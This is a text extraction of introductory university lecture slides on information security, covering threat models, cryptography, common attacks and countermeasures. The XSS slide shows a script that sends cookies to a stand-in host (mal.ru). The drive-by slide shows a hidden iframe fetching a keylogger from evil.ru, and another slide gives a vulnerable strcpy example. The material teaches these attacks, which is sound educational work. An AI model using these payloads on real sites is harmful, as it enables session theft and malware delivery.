A brief introduction to information security - Part II · Security threats Countering security...

13
A brief introduction to information security Part II Tyler Moore Computer Science & Engineering Department, SMU, Dallas, TX Lecture 3 Engineered defenses to achieve protection goals Security threats Countering security threats Let’s recap last time Safety vs. security Information security protection goals 1 Confidentiality: information is accessible only to authorized parties 2 Integrity: modification of information can be detected 3 Availability: authorized parties can access information (and use resources) when and where it is needed Identification vs. authentication vs. authorization Computer systems and networks 2 / 54 Engineered defenses to achieve protection goals Security threats Countering security threats Information security overview Protection Goals Confidentiality Integrity Availability 1. Engineer defenses Satisfy goals 2. Security threats 3. Countering security threats 3 / 54 Engineered defenses to achieve protection goals Security threats Countering security threats Threat models Access control for system security Cryptography for communication security Engineered defenses to achieve protection goals Protection Goals Confidentiality Integrity Availability 1. Engineer defenses Satisfy goals 5 / 54 Notes Notes Notes Notes

Transcript of A brief introduction to information security - Part II · Security threats Countering security...

Page 1: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

A brief introduction to information securityPart II

Tyler Moore

Computer Science & Engineering Department, SMU, Dallas, TX

Lecture 3

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Let’s recap last time

Safety vs. security

Information security protection goals1 Confidentiality: information is accessible only to authorized

parties2 Integrity: modification of information can be detected3 Availability: authorized parties can access information (and

use resources) when and where it is needed

Identification vs. authentication vs. authorization

Computer systems and networks

2 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Information security overview

Protection GoalsConfidentialityIntegrityAvailability

1. Engineer defenses

Satisfy goals2. Security threats

3. Countering security threats

3 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Engineered defenses to achieve protection goals

Protection GoalsConfidentialityIntegrityAvailability

1. Engineer defenses

Satisfy goals

5 / 54

Notes

Notes

Notes

Notes

Page 2: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Threat models

All security is relative, but relative to what?

⇒ Threat models codify assumed adversary behavior

Threat models articulate assumed adversary behavior1 Goal: disrupting defender’s protection goals, make money,

wreak havoc2 Knowledge: does the attacker know how the defense works?3 Capabilities: Computational power available, time available to

target defenders, local vs. global eavesdropping, active vs.passive

Question: could a threat model be fully specified by assuminga certain level of financial resources available to the adversary?

6 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Access control

Recall claim from last class: authorization decision is thefundamental challenge of security engineering

Access control is how computer systems enforce authorizationdecisions

⇒ definition: ensuring that authorized user can access andmodify only those resources to which he is entitled

7 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

The rise of the superuser

Operating systems (OSes) separate processes that run the OSfrom processes run by users

OS processes have many powers – reading allcommunications, installing software, etc.

These powers can readily be abused by a malicious softwaredesigner

Solution: create a superuser that can have OS-levelcapabilities, constrain what regular users can do

8 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Operating System Security

KERNEL

P3

P2

P1

R1

R2

R3

Pi process i

Rj resource j

prevent side channelsand covert channels

enforce authorization decisionsfor inter-process communicationand resource access

direct access: MS DOS, MacOS 9, Win 3.11, 95, 98, ME,many embedded systems

secretkey

Same principle on higher layers: virtualization, sandboxes, . . .

9 / 54

Notes

Notes

Notes

Notes

Page 3: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Principle of least privilege

Principle of least privilege: any file or process should be assignedthe minimum level of permissions needed in order to completerequired task

+ Limits the damage a process can cause others

- Conflicts with desire to make systems easy-to-use andadaptable

Question: what incentive conflict does a programmer facewhen requesting privileges?

10 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Cryptography

Protecting information on a computer system is necessary butnot sufficient to meet protection goals

Must also protect communications between systems

Cryptography (crypto for short) can be used to ensureconfidentiality and integrity of communications

12 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Recall the broker example from last time

Broker Exchange

〈BUY,200,GOOG,$600.25〉

13 / 54

Notes

Notes

Notes

Notes

Page 4: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Crypto traditionally refers to Alice and Bob

Alice Bob

I love your music

Eve Mallory

hate

14 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Crypto B.C.

Julius Caesar enciphered messages by shiftingletters by three

Those receiving the message knew to shiftback

Plaintext: THISISIMPORTANT

Caesar

Secret key: DDDDDDDDDDDDDDD

Ciphertext: WKLVLVLPSRUWDQW

15 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Vigenere cipher

Shift each letter by a different amount, repeating after n letters

Plaintext: THISISIMPORTANT

Vigenere

Secret key: DABDABDABDABDAB

Ciphertext: WHJVITLMQRRUDNU

16 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

One-time pad

Shift each letter by a different amount, never repeating

Plaintext: THISISIMPORTANT

One-time pad

Secret key: DABHJIZXEBTULQP

Ciphertext: WHJZRAHJTPKNLDI

Question: what is the key length?

17 / 54

Notes

Notes

Notes

Notes

Page 5: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Symmetric cryptography

Alice

Bob

{I love your music}kAB

Keydistribution

center

kABkAB

18 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Symmetric cryptography

Instead of a word, secret keys in modern symmetric encryptionsystems (e.g., AES) are stored as random sequences of bits

Keys are short relative to the message (unless using aone-time pad)

Limiting factor: distributing a shared secret to both partiesbefore communicating securely

19 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Perils of long keys: Russian one-time pad

Source: Marcus Ranum/MI5

20 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Asymmetric cryptography (aka public-key cryptography)

Huge breakthrough: communicating parties do not need toshare a secret key in advance

Trick: use one-way functions that are easy to compute butdifficult to reverse

Rather than a shared secret, generate a key pair

KA−1 : public key to encrypt messagesKA: private key to decrypt messages

Private keys kept secret, but public keys can be told toeveryone

Keys are tied to individuals, not pairs of individuals

⇒ n key pairs for n peopleQuestion: how many symmetric keys would be needed for npeople to communicate?

21 / 54

Notes

Notes

Notes

Notes

Page 6: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Asymmetric cryptography: protecting confidentiality

Alice

Bob

Broadcast KB−1

{I love your music}KB−1

Decrypt message{{I love your music}kB−1}KB

22 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Asymmetric cryptography: protecting integrity

Alice

Bob

Broadcast KA−1

{I love your music}KA

Decrypt message{{I love your music}kA}KA−1

23 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Using asymmetric crypto to distribute symmetric keys

BobAmazon

0. Publish public key KA−1 to C.A.

1. Look up Amazon’s public keyKA−1

2. Choose session key KBA,encrypt and send {KBA}KA−1

3. Decrypt {{KBA}KA−1}KA

usingprivate keyKA

4. {Request payment}KBA

5. {Credit Card #}KBA

24 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Threat modelsAccess control for system securityCryptography for communication security

Why crypto is still hard in practice

Key management is hard to get right

⇒ Establishing public-key infrastructure tying identifiers to keyshas proved elusive

Configuring systems can be difficult

⇒ Coordinating the distribution of information such as publickeys before communication is inconvenient

Cryptosystems are often brittle and do not fail gracefully

25 / 54

Notes

Notes

Notes

Notes

Page 7: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Security threats

Protection GoalsConfidentialityIntegrityAvailability

1. Engineer defenses

Satisfy goals2. Security threats

27 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Security threats: assumptions gone awry

System vulnerabilities: violate engineering assumptions

Cryptanalysis: violate physical or mathematical assumptions

People just don’t behave as designers expect

Violate assumptions about attacker behaviorViolate assumptions about defender behavior

28 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Privilege-escalation attacks

Recall that operating systems separate privileged data andprograms from normal files and processes

Only superusers are allowed to execute sensitive andpotentially harmful operations

Privilege-escalation attack: take on the role of superuser tocarry out unauthorized actions (e.g., installing malicioussoftware or reading sensitive files)

Adversaries exploit “bugs” to carry out attacks

29 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Buffer Overflow

Example function in C:

i n t p a r s e ( char ∗ msg ){ char tmp [ 1 0 0 0 ] ;

s t r c p y ( tmp , msg ) ;. . . // do morer e t u r n 0 ;

}

Strings are zero-delimited arrays:”test” → 0x74 65 73 74 00

Function strcpy cannot know the sizeof the destination buffer tmp.

Stack of the x86 architecture:

return address

local variables

add

ress

spac

e

&tmp[0]

&tmp[1000]

1001st to 1004th characteroverwrite return address

malicious code

User-provided code is executed with the privileges of the host program.

30 / 54

Notes

Notes

Notes

Notes

Page 8: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Cross Site Scripting

client A web server

client B

attacker B

post user comment

post malformed user commentinitiate session

receive session ID

store ascookie

...

access user-generated content

retrieve B’s posting

execute B’s code in client A

steal A’s session ID

...

impersonate A

<script>

document.write(’’<img src=\’’http://www.mal.ru/’’+encodeURI(document.cookie)+’’\’’>’’);</script>

31 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Code-injection attacks on xkcd

32 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Drive-by-download attacks

Work in a similar manner to cross-site scripting, but actuallygain write access to the web server

Insert embedded links to malicious websites that downloadlinks automatically

⇒ <iframe height=‘‘1’’ width=‘‘1’’

src=‘‘http://evil.ru/keylogger.exe’’></iframe>

Question: how would encryption help preventdrive-by-download attacks or code-injection attacks?

33 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Where attacks take place

ISP 1 ISP 2

switchend-user PC

router router

Web server

Attacker

1: directly target end user

spam

spam

2:

eave

sdro

p

Malicious server

3: host malware

4: insert malware

34 / 54

Notes

Notes

Notes

Notes

Page 9: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Cryptanalysis

Goal of cryptanalysis: descramble ciphertext without knowingthe decryption key

Simplest approach: brute force

Key of length ` bits ⇒ 2`−1 guessesFor AES-128, ` = 128, so brute force requires 2127 attempts(100 times a trillion times a trillion times a trillion)

Cryptanalysts look for shortcuts (so that 2k guesses required,where k < `

What do the shortcuts look like?

Mathematical assumptions can failLook for patterns in ciphertext (i.e., loss of randomness)

35 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Distribution of letters in English

36 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Kerckhoffs’ Principle

Cryptographic algorithms mustbe public. Security depends onlyon the secrecy of the keys.

Rationales:– avoid blind trust– more eyes find more flaws– err on the side of caution– changing keys is easier than

changing the system– the only reasonable assumption to

protect a public infrastructure

→ No security by obscurity

37 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

What can happen if you ignore Kerckhoffs

Source: http://www.schneier.com/blog/archives/2008/08/hacking_mifare.html

38 / 54

Notes

Notes

Notes

Notes

Page 10: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Do cryptanalysts have the right threat model?

Adi Shamir

Cryptography is usually bypassed. I amnot aware of any major world-classsecurity system employing cryptographyin which the hackers penetrated thesystem by actually going through thecryptanalysis. [. . . ] Usually there aremuch simpler ways of penetrating thesecurity system.

39 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Most attackers bypass the threat model

This shouldn’t be surprising: a well-engineered system will bedesigned so that the attacks they planned for are hard to carryout

Threat models can go wrong in two ways1 Ascribe too much power to an attacker or focus too much on a

particular mode of attack

⇒ Leads to “over-engineering” and over-investment in defensesagainst certain threats

2 Miss attacks by not accounting for behaviors and capabilities

40 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Threat model adopted by cryptanalysts fail on both counts

Often overestimates attacker capability (focus on nation-stateas adversary)

Singular focus on decrypting ciphertext without access to theencryption key ignores how most attacks take place

Much cheaper for an attacker to find a way to recover the key

41 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Cold-boot attacks recover keys stored in volatile memory

Source: https://citp.princeton.edu/research/memory/

42 / 54

Notes

Notes

Notes

Notes

Page 11: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Users don’t always behave as system designers envision

Many successful attacks trick users into sharing keys andpasswords

Systems security is predicated on users only taking actionsthat are in their own interest

⇒ Makes their job tractable⇒ Offloads the hard decision of whether to allow untrusted

software to execute onto the end user

43 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

System vulnerabilities: violating engineering assumptionsCryptanalysis: violating physical or mathematical assumptionsViolating assumptions about attacker behaviorViolating assumptions about defender behavior

Prompts condition users to ignore security warnings

44 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Countering security threats

Protection GoalsConfidentialityIntegrityAvailability

1. Engineer defenses

Satisfy goals2. Security threats

3. Countering security threats

46 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Countering security threats

When weaknesses are discovered in security defenses,defenders have two choices

1 Make fundamental changes to defenses2 Counter the attacks directly

First approach could lead to improved security in the long run,but it is slow

Second approach is reactive, but more responsive1 Ex post countermeasures: counter attacks and flaws after they

are encountered2 Ex ante countermeasures: counter flaws before an attack is

realized

47 / 54

Notes

Notes

Notes

Notes

Page 12: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Ex post countermeasure: antivirus software

Most common ex post countermeasure

Checks for “signatures” of malicious executables running on asystem

Database constantly growing to check for newly discoveredmalware

Cohen proved that detecting viruses in general reduces to thehalting problem

⇒ AV software likely to remain a step behind virus writers

48 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Ex post countermeasure: intrusion detection systems

IDSes look for attacks taking place on the network

Rule-based systems check for known attack patternsAnomaly-based systems check for deviations from “good”traffic patterns

Challenges for IDSes

Internet is noisy – distinguishing malice from incompetence isnon-trivialFalse positives can undermine the system when true attacksare rare

49 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Ex post countermeasure: intrusion detection systems

Suppose there are 10 true attacks for every one millionnetwork sessions

1% false positive rate ⇒ 10, 000 false positives per one millionsessions

1000:1 ratio of false positives to true positives

50 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Ex post countermeasure: filters

Filters are popular tool to block unwanted traffic

Usually operate at either network or application layer

Network layer is more efficient, but less granular (e.g., blockoutgoing port 25 trafic, allow incoming port 80)Application layer is more granular (e.g., block unwantedURLs), but easier to circumvent and raises privacy concerns

Ingress vs. egress filtering

Ingress filtering can give false sense of security – many harmsemanate from within a networkEgress filtering protects against outgoing harm – when mightyou want that?

51 / 54

Notes

Notes

Notes

Notes

Page 13: A brief introduction to information security - Part II · Security threats Countering security threats Let’s recap last time Safety vs. security ... Source: Marcus Ranum/MI5 20/54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Where defenses are placed

ISP 1 ISP 2

switchend-user PC

router router

Web server

Attacker

1: directly target end user

spam

spam

2:

eave

sdro

p

Malicious server

3: host malware

4: insert malware

Defense

antivirus

firewall

blacklist

Defense

IDS

firewall

app. relay

Defense

IDS

firewall

Input validation

52 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Considerations for where to defend

Technical considerations

Hard (and sometimes illegal!) to do application level filteringat ISPsWeb servers should do input validation for maximum coverage

Economic considerations

Consider these attack scenarios: discuss which stakeholdershave incentive to defend

1 Spam coming from an infected computer2 Website hacked to distribute drive-by-download3 Website vulnerable to input-validation attack that steals server

data

53 / 54

Engineered defenses to achieve protection goalsSecurity threats

Countering security threats

Ex post countermeasuresEx ante countermeasures

Ex ante countermeasure

Can be more proactive in defense, taking action before anincident happens

Compliance mechanisms (e.g., audit, penetration testing) lookfor configuration flaws before attackers do

Fundamental changes to the security infrastructure (e.g.,Microsoft’s effort to improve security during softwaredevelopment)

Key issue: do you incur small certain cost now or larger butmore uncertain cost later?

54 / 54

Notes

Notes

Notes

Notes